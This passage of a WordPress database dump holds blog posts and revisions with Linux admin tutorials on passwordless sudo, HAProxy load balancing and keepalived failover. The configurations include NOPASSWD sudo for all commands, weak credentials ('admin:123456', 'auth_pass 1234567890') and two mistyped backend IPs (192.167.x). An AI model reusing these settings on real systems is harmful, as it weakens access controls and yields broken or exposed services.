mysqli_connect(): The server requested authentication method unknown to the client [caching_sha2_password]','','inherit','closed','closed','','583-revision-v1','','','2021-06-30 14:41:48','2021-06-30 14:41:48','',583,'http://ictbank.ir/blog/?p=584',0,'revision','',0),
(602,2,'2022-02-02 09:47:22','2022-02-02 09:47:22','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-phlox','','','2022-02-02 09:47:22','2022-02-02 09:47:22','',0,'http://ictbank.ir/blog/wp-global-styles-phlox/',0,'wp_global_styles','',0),
(603,2,'2022-02-02 09:54:39','2022-02-02 09:54:39','<!-- wp:paragraph -->\n<p>Typing password for sudo commands is an awful experience. So here\'s what we should do to stop linux asking for password:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1. Backup the sudoers file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">cp /etc/sudoers /etc/sudoers.old</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>2. Open the sudoers file for edit:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">visudo</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>3. Edit sudoers file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">username ALL=(ALL) NOPASSWD: ALL</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','sudo without password','','publish','open','open','','sudo-without-password','','','2023-05-01 16:07:43','2023-05-01 16:07:43','',0,'http://ictbank.ir/blog/?p=603',0,'post','',0),
(604,2,'2022-02-02 09:54:39','2022-02-02 09:54:39','<!-- wp:paragraph -->\n<p>Typing password for sudo commands is an awful experience. So here\'s what we should do to stop linux asking for password:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1. Backup the sudoers file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">cp /etc/sudoers /etc/sudoers.old</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>2. Open the sudoers file for edit:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">visudo</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>3. Edit sudoers file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">username ALL=(ALL) NOPASSWD: ALL</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','sudo without password','','inherit','closed','closed','','603-revision-v1','','','2022-02-02 09:54:39','2022-02-02 09:54:39','',603,'http://ictbank.ir/blog/?p=604',0,'revision','',0),
(607,1,'2022-02-19 05:26:56','2022-02-19 05:26:56','','Order – February 19, 2022 @ 05:26 AM','','wc-cancelled','open','closed','wc_order_OhaAwrebIpUzc','order-feb-19-2022-0526-am','','','2022-02-19 06:54:44','2022-02-19 06:54:44','',0,'http://ictbank.ir/blog/?post_type=shop_order&p=607',0,'shop_order','',0),
(613,2,'2022-11-23 07:05:44','2022-11-23 07:05:44','<!-- wp:paragraph -->\n<p>You have many options to install and configure a loadbalancer in RedHat 7. One of the best options is HAPorxy. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To setup HAProxy, you have to download related RPM file and then install it:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">rpm -ivh haproxy.rpm</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then, you have to make changes in config file (/etc/haproxy/haproxy.conf):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>in this sample we have 4 servers as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>APP1: 192.168.1.2</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>APP2: 192.168.1.3</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>APP3: 192.168.1.4</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>LoadBalancer: 192.168.1.5</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">global\n log 127.0.0.1:514 local2 debug\n chroot /var/lib/haproxy\n pidfile /var/run/haproxy.pid\n maxconn 4000\n user haproxy\n group haproxy\n daemon\n maxconn 10000\n stats socket /var/lib/haproxy/stats\n tune.ssl.default-dh-param 2048\n \nlisten stats\n bind *:4331\n mode http\n log global\n maxconn 10\n timeout client 100s\n timeout server 100s\n timeout connect 100s\n timeout queue 100s\n stats refresh 30s\n stats enable\n stats uri /haproxy?stats\n stats realm HAProxy\\ Statistics\n stats auth admin:123456\n stats show-node\n\n \nfrontend public\n bind *:80 name clear\n redirect scheme https code 301 if !{ ssl_fc }\n bind *:443 ssl crt /etc/pki/tls/certs/app_test.pem\n mode http\n log 127.0.0.1:514 local3 debug\n log-format \"%ci:%cp [%tr] %ft %b/%s %TR/%Tw/%Tc/%Tr/%Ta %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs %{+Q}r\"\n http-request set-log-level debug\n option tcplog\n option httplog\n option dontlognull\n monitor-uri /monitoruri\n maxconn 8000\n timeout client 30s\n default_backend app_test\n\nbackend app_test\n mode http\n log 127.0.0.1:514 local4 debug\n option tcplog\n option httplog\n option dontlognull\n log-format \"%ci:%cp [%tr] %ft %b/%s %TR/%Tw/%Tc/%Tr/%Ta %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs %{+Q}r\"\n maxconn 10000\n balance roundrobin\n cookie SERVERID insert indirect nocache\n option prefer-last-server\n option forwardfor\n retries 2\n option redispatch\n timeout connect 50s\n timeout server 50s\n server s1 192.168.1.2:80 check cookie s1\n server s2 192.167.1.3:80 check cookie s2\n server s3 192.167.1.4:80 check cookie s3</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you have to start the haproxy and make it autostart on reboots with these two commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl start haproxy.service\nsystemctl enable haproxy.service</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>you can see the statistics page with this url:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">http://192.168.1.5:4331/haproxy?stats</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and your application can be accessed via the IP of this server.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sometimes you encountered the following error:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">haproxy Starting proxy stats: cannot bind socket [0.0.0.0:4331]</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>In order to solve this error, you have to run this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">setsebool -P haproxy_connect_any=1</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>to see the system log:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">tail -f /var/log/haproxy.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>to see the access log:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code {\"highlightLines\":\"\"} -->\n<pre class=\"wp-block-syntaxhighlighter-code\">tail -f /var/log/haproxy-access-frontend.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>As you can see, you have to install rsyslog on your server, to do so, run these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">yum install -y rsyslog\nsystemctl enable rsyslogd\nsystemctl start rsyslog</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>After that, you should config rsyslog to gather HAProxy\'s logs. So you have to edit /etc/rsyslog.conf file and add these lines:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">local2.* /var/log/haproxy.log\nlocal3.* /var/log/haproxy-access-frontend.log\nlocal4.* /var/log/haproxy-access-backend.log</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that a new file in /etc/rsyslog.d/ should be created as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi /etc/rsyslog.d/haproxy.conf</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">[root@s1vlmizbanlvs01 haproxy_reports]# cat /etc/rsyslog.d/haproxy.conf\n# Create an additional socket in haproxy\'s chroot in order to allow logging via\n# /dev/log to chroot\'ed HAProxy processes\n#$AddUnixListenSocket /var/lib/haproxy/dev/log\n\n# Send HAProxy messages to a dedicated logfile\n#if $programname startswith \'haproxy\' then /var/log/haproxy.log\n#&~\n$ModLoad imudp\n$UDPServerAddress 127.0.0.1\n$UDPServerRun 514\nlocal2.* /var/log/haproxy.log\nlocal3.* /var/log/haproxy-access-frontend.log\nlocal4.* /var/log/haproxy-access-backend.log\n</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then, you have to restart the service:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl restart rsyslogd</pre>\n<!-- /wp:syntaxhighlighter/code -->','How to setup a loadbalancer with HAProxy in RedHat 7','','inherit','closed','closed','','104-revision-v1','','','2022-11-23 07:05:44','2022-11-23 07:05:44','',104,'http://ictbank.ir/blog/?p=613',0,'revision','',0),
(615,2,'2022-12-03 09:39:19','2022-12-03 09:39:19','<!-- wp:paragraph -->\n<p>To prevent service failure during disasters like server crash or so on, we have to find Single Point of Failure components and setup High Availability solutions for them.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this article I am going to define how to setup High Availability for HAProxy service. The structure of service would be something like below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":621,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://ictbank.ir/blog/wp-content/uploads/2022/12/HAProxy-High-Availability.png\" alt=\"\" class=\"wp-image-621\"/><figcaption class=\"wp-element-caption\">HAProxy structure map</figcaption></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>In this scenario, there is a Virtual IP which is 192.168.1.205, and can be used for both HAProxy servers. This VIP points to the master server (192.168.1.201) in normal conditions, and if something bad happens to this server, the VIP will point to the other server (192.168.1.200).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all you have to install HAProxy on both servers using this <a href=\"http://ictbank.ir/blog/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/\" data-type=\"post\" data-id=\"104\">link</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>After that all you need is installing and configurating keepalived service on your OS (here we use CentOS 7):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">yum install keepalived -y</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you should change the service\'s configurations:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi /etc/keepalived/keepalived.conf</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And delete all it\'s content and replace them with the following. For config file of Master server:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vrrp_script chk_haproxy {\n script \"/usr/sbin/pidof haproxy\"\n interval 1\n}\n\nvrrp_instance VI_1 {\n interface ens160\n state MASTER\n priority 200\n\n virtual_router_id 33\n unicast_src_ip 192.168.1.201\n unicast_peer {\n 192.168.1.200\n }\n\n authentication {\n auth_type PASS\n auth_pass 1234567890\n }\n\n virtual_ipaddress {\n 192.168.1.205\n }\n\n track_script {\n chk_haproxy\n }\n\n notify_master /etc/keepalived/master.sh\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And for config file of Backup server:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vrrp_script chk_haproxy {\n script \"/usr/sbin/pidof haproxy\"\n interval 1\n}\n\nvrrp_instance VI_1 {\n interface ens160\n state BACKUP\n priority 100\n\n virtual_router_id 33\n unicast_src_ip 192.168.1.200\n unicast_peer {\n 192.168.1.201\n }\n\n authentication {\n auth_type PASS\n auth_pass 1234567890\n }\n\n virtual_ipaddress {\n 192.168.1.205\n }\n\n track_script {\n chk_haproxy\n }\n\n notify_master /etc/keepalived/master.sh\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And finally you have to restart the service and enable it for next startups:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl enable keepalived\nsystemctl restart keepalived</pre>\n<!-- /wp:syntaxhighlighter/code -->','Setup High Availability for HAProxy','','publish','open','open','','setup-high-availability-for-haproxy','','','2023-05-01 16:01:53','2023-05-01 16:01:53','',0,'http://ictbank.ir/blog/?p=615',0,'post','',0),
(618,2,'2022-12-03 08:26:06','2022-12-03 08:26:06','<!-- wp:paragraph -->\n<p>To prevent service failure during disasters like server crash or so on, we have to find Single Point of Failure components and setup High Availability solutions for them.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this article I am going to define how to setup High Availability for HAProxy service. The structure of service would be something like below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":621,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://ictbank.ir/blog/wp-content/uploads/2022/12/HAProxy-High-Availability.png\" alt=\"\" class=\"wp-image-621\"/><figcaption class=\"wp-element-caption\">HAProxy structure map</figcaption></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>In this scenario, there is a Virtual IP which is 192.168.1.205, and can be used for both HAProxy servers. This VIP points to the master server (192.168.1.201) in normal conditions, and if something bad happens to this server, the VIP will point to the other server (192.168.1.200).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all you have to install HAProxy on both servers using this <a href=\"http://ictbank.ir/blog/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/\" data-type=\"post\" data-id=\"104\">link</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>After that all you need is installing and configurating keepalived service on your OS (here we use CentOS 7):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">yum install keepalived -y</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you should change the service\'s configurations:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi /etc/keepalived/keepalived.conf</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And delete all it\'s content and replace them with the following. For config file of Master server:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vrrp_script chk_haproxy {\n script \"/usr/sbin/pidof haproxy\"\n interval 1\n}\n\nvrrp_instance VI_1 {\n interface ens160\n state MASTER\n priority 200\n\n virtual_router_id 33\n unicast_src_ip 192.168.1.201\n unicast_peer {\n 192.168.1.200\n }\n\n authentication {\n auth_type PASS\n auth_pass 1234567890\n }\n\n virtual_ipaddress {\n 192.168.1.205\n }\n\n track_script {\n chk_haproxy\n }\n\n notify_master /etc/keepalived/master.sh\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And for config file of Backup server:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vrrp_script chk_haproxy {\n script \"/usr/sbin/pidof haproxy\"\n interval 1\n}\n\nvrrp_instance VI_1 {\n interface ens160\n state BACKUP\n priority 100\n\n virtual_router_id 33\n unicast_src_ip 192.168.1.200\n unicast_peer {\n 192.168.1.201\n }\n\n authentication {\n auth_type PASS\n auth_pass 1234567890\n }\n\n virtual_ipaddress {\n 192.168.1.205\n }\n\n track_script {\n chk_haproxy\n }\n\n notify_master /etc/keepalived/master.sh\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And finally you have to restart the service and enable it for next startups:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl enable keepalived\nsystemctl restart keepalived</pre>\n<!-- /wp:syntaxhighlighter/code -->','Setup High Availability for HAProxy','','inherit','closed','closed','','615-revision-v1','','','2022-12-03 08:26:06','2022-12-03 08:26:06','',615,'http://ictbank.ir/blog/?p=618',0,'revision','',0),
(619,2,'2022-12-03 09:29:02','2022-12-03 09:29:02','<!-- wp:paragraph -->\n<p>To prevent service failure during disasters like server crash or so on, we have to find Single Point of Failure components and setup High Availability solutions for them.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this article I am going to define how to setup High Availability for HAProxy service. The structure of service would be something like below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":621,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://ictbank.ir/blog/wp-content/uploads/2022/12/HAProxy-High-Availability.png\" alt=\"\" class=\"wp-image-621\"/><figcaption class=\"wp-element-caption\">HAProxy structure map</figcaption></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>In this scenario, there is a Virtual IP which is 192.168.1.205, and can be used for both HAProxy servers. This VIP points to the master server (192.168.1.201) in normal conditions, and if something bad happens to this server, the VIP will point to the other server (192.168.1.200).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all you have to install HAProxy on both servers using this <a href=\"http://ictbank.ir/blog/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/\" data-type=\"post\" data-id=\"104\">link</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>After that all you need is installing and configurating keepalived service on your OS (here we use CentOS 7):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">yum install keepalived -y</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you should change the service\'s configurations:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi /etc/keepalived/keepalived.conf</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And delete all it\'s content and replace them with the following. For config file of Master server:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vrrp_script chk_haproxy {\n script \"/usr/sbin/pidof haproxy\"\n interval 1\n}\n\nvrrp_instance VI_1 {\n interface ens160\n state MASTER\n priority 200\n\n virtual_router_id 33\n unicast_src_ip 192.168.1.201\n unicast_peer {\n 192.168.1.200\n }\n\n authentication {\n auth_type PASS\n auth_pass 1234567890\n }\n\n virtual_ipaddress {\n 192.168.1.205\n }\n\n track_script {\n chk_haproxy\n }\n\n notify_master /etc/keepalived/master.sh\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And for config file of Backup server:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vrrp_script chk_haproxy {\n script \"/usr/sbin/pidof haproxy\"\n interval 1\n}\n\nvrrp_instance VI_1 {\n interface ens160\n state BACKUP\n priority 100\n\n virtual_router_id 33\n unicast_src_ip 192.168.1.200\n unicast_peer {\n 192.168.1.201\n }\n\n authentication {\n auth_type PASS\n auth_pass 1234567890\n }\n\n virtual_ipaddress {\n 192.168.1.205\n }\n\n track_script {\n chk_haproxy\n }\n\n notify_master /etc/keepalived/master.sh\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And finally you have to restart the service and enable it for next startups:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl enable keepalived\nsystemctl restart keepalived</pre>\n<!-- /wp:syntaxhighlighter/code -->','Setup High Availability for HAProxy','','inherit','closed','closed','','615-revision-v1','','','2022-12-03 09:29:02','2022-12-03 09:29:02','',615,'http://ictbank.ir/blog/?p=619',0,'revision','',0),
(620,2,'2022-12-03 09:39:19','2022-12-03 09:39:19','<!-- wp:paragraph -->\n<p>To prevent service failure during disasters like server crash or so on, we have to find Single Point of Failure components and setup High Availability solutions for them.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this article I am going to define how to setup High Availability for HAProxy service. The structure of service would be something like below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":621,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://ictbank.ir/blog/wp-content/uploads/2022/12/HAProxy-High-Availability.png\" alt=\"\" class=\"wp-image-621\"/><figcaption class=\"wp-element-caption\">HAProxy structure map</figcaption></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>In this scenario, there is a Virtual IP which is 192.168.1.205, and can be used for both HAProxy servers. This VIP points to the master server (192.168.1.201) in normal conditions, and if something bad happens to this server, the VIP will point to the other server (192.168.1.200).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all you have to install HAProxy on both servers using this <a href=\"http://ictbank.ir/blog/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/\" data-type=\"post\" data-id=\"104\">link</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>After that all you need is installing and configurating keepalived service on your OS (here we use CentOS 7):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">yum install keepalived -y</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you should change the service\'s configurations:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi /etc/keepalived/keepalived.conf</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And delete all it\'s content and replace them with the following. For config file of Master server:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vrrp_script chk_haproxy {\n script \"/usr/sbin/pidof haproxy\"\n interval 1\n}\n\nvrrp_instance VI_1 {\n interface ens160\n state MASTER\n priority 200\n\n virtual_router_id 33\n unicast_src_ip 192.168.1.201\n unicast_peer {\n 192.168.1.200\n }\n\n authentication {\n auth_type PASS\n auth_pass 1234567890\n }\n\n virtual_ipaddress {\n 192.168.1.205\n }\n\n track_script {\n chk_haproxy\n }\n\n notify_master /etc/keepalived/master.sh\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And for config file of Backup server:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vrrp_script chk_haproxy {\n script \"/usr/sbin/pidof haproxy\"\n interval 1\n}\n\nvrrp_instance VI_1 {\n interface ens160\n state BACKUP\n priority 100\n\n virtual_router_id 33\n unicast_src_ip 192.168.1.200\n unicast_peer {\n 192.168.1.201\n }\n\n authentication {\n auth_type PASS\n auth_pass 1234567890\n }\n\n virtual_ipaddress {\n 192.168.1.205\n }\n\n track_script {\n chk_haproxy\n }\n\n notify_master /etc/keepalived/master.sh\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And finally you have to restart the service and enable it for next startups:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">systemctl enable keepalived\nsystemctl restart keepalived</pre>\n<!-- /wp:syntaxhighlighter/code -->','Setup High Availability for HAProxy','','inherit','closed','closed','','615-revision-v1','','','2022-12-03 09:39:19','2022-12-03 09:39:19','',615,'http://ictbank.ir/blog/?p=620',0,'revision','',0),
(622,2,'2022-12-03 09:39:52','2022-12-03 09:39:52','<!-- wp:paragraph -->\n<p>To prevent service failure during disasters like server crash or so on, we have to find Single Point of Failure components and setup High Availability solutions for them.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this article I am going to define how to setup High Availability for HAProxy service. The structure of service would be something like below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":621,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://ictbank.ir/blog/wp-content/uploads/2022/12/HAProxy-High-Availability.png\" alt=\"\" class=\"wp-image-621\"/><figcaption class=\"wp-element-caption\">HAProxy structure map</figcaption></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>In this scenario, there is a Virtual IP which is 192.168.1.205, and can be used for both HAProxy servers. This VIP points to the master server (192.168.1.201) in normal conditions, and if something bad happens to this server, the VIP will point to the other server (192.168.1.200).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all you have to install HAProxy on both servers using this <a href=\"http://ictbank.ir/blog/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/\" data-type=\"post\" data-id=\"104\">link</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>After that all you need is installing and configurating keepalived service on your OS (here we use CentOS 7):</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">yum install keepalived -y</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you should change the service\'s configurations:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi /etc/keepalived/keepalived.conf</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And delete all it\'s content and replace them with the following. For config file of Master server:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vrrp_script chk_haproxy {\n script \"/usr/sbin/pidof haproxy\"\n interval 1\n}\n\nvrrp_instance VI_1 {\n interface ens160\n state MASTER\n priority 200\n\n virtual_router_id 33\n unicast_src_ip 192.168.1.201\n unicast_peer {\n 192.168.1.200\n }\n\n authentication {\n auth_type PASS\n auth_pass 1234567890\n }\n\n virtual_ipaddress {\n 192.168.1.205\n }\n\n track_script {\n chk_haproxy\n }\n\n notify_master /etc/keepalived/master.sh\n}</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>And for config file of Backup server:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vrrp_script chk_haproxy {\n script \"/usr/sbin/pidof haproxy\"\n interval 1\n}\n\nvrrp_instance VI_1 